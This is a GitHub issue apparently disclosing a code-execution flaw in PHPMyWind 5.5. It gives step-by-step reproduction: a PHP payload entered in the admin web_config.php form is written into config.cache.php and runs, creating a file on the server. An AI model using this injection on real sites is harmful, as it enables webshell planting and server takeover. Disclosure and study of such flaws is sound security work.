Skip to content

phpmywind5.5 Code Execution2 #5

@panghusec

Description

@panghusec

Attackers can get webshell or code execution

1.First download the phpmywind the Latest version from http://phpmywind.com/downloads/PHPMyWind_5.5.zip

2.install it

3.login as Admin

4.request http://localhost/admin/web_config.php

shell
(select number!!!!!)
payload 1;file_put_contents("../panghusec.txt","just a test");
burp

5.then the payload is written in the include/config.cache.php

get

then in root directory panghusec.txt will be created:-)
In summary: from admin/web_config.php Insert data into database and in lines 66 enter !Writef function and code execution :)

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions